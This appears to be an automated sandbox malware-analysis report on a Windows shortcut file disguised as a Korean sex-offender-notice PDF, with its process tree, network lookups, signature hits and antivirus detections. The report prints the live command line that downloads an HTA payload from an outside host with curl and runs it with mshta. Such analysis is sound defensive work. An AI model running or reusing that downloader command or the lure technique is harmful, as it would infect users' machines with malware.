Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | April 23, 2025, 1:26 p.m. | April 23, 2025, 1:31 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "YpcamCrNwyvApKoN" "C:\Users\test22\AppData\Local\Temp\성범죄자 신상정보 고지.pdf.lnk"
2540-
cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && curl -O https://cdn.glitch.global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw.hta?v=2 && mshta C:\Users\test22\AppData\Local\Temp\sfmw.hta
2656
-
Name | Response | Post-Analysis Lookup |
---|---|---|
cdn.glitch.global |
CNAME
j.sni.global.fastly.net
|
151.101.66.132 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.3 192.168.56.101:49167 146.75.50.132:443 |
None | None | None |
file | C:\Users\test22\AppData\Local\Temp\성범죄자 신상정보 고지.pdf.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && curl -O https://cdn.glitch.global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw.hta?v=2 && mshta C:\Users\test22\AppData\Local\Temp\sfmw.hta |
cmdline | mshta C:\Users\test22\AppData\Local\Temp\sfmw.hta |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
Lionic | Trojan.WinLNK.Nioc.4!c |
CTX | lnk.trojan.nioc |
CAT-QuickHeal | Html.Trojan.A14067327 |
Skyhigh | BehavesLike.Trojan.zr |
ALYac | Trojan.Agent.LNK.Gen |
VIPRE | Heur.BZC.YAX.Nioc.1.1CDCF038 |
Arcabit | Heur.BZC.YAX.Nioc.1.1CDCF038 |
Symantec | Trojan Horse |
ESET-NOD32 | LNK/Downloader.A suspicious |
TrendMicro-HouseCall | TROJ_FRS.VSNTCP25 |
Avast | Other:Malware-gen [Trj] |
Kaspersky | HEUR:Trojan.WinLNK.Agent.gen |
BitDefender | Heur.BZC.YAX.Nioc.1.1CDCF038 |
MicroWorld-eScan | Heur.BZC.YAX.Nioc.1.1CDCF038 |
Rising | Downloader.Mshta/LNK!1.BADA (CLASSIC) |
Emsisoft | Heur.BZC.YAX.Nioc.1.1CDCF038 (B) |
TrendMicro | TROJ_FRS.VSNTCP25 |
SentinelOne | Static AI - Suspicious LNK |
Detected | |
ViRobot | LNK.S.Agent.1535 |
GData | Heur.BZC.YAX.Nioc.1.1CDCF038 |
Varist | LNK/ABTrojan.EJWN- |
AhnLab-V3 | Downloader/LNK.Generic.SC261280 |
McAfee | LNK/Agent.a |
VBA32 | suspected of Trojan.Link.URL |
Zoner | Probably Heur.LNKScript |
Tencent | Win32.Trojan.Agent.Iflw |
huorong | TrojanDownloader/LNK.Agent.da |
Fortinet | LNK/Agent.ACX!tr |
AVG | Other:Malware-gen [Trj] |
alibabacloud | Trojan[downloader]:Win/BZC.YMF |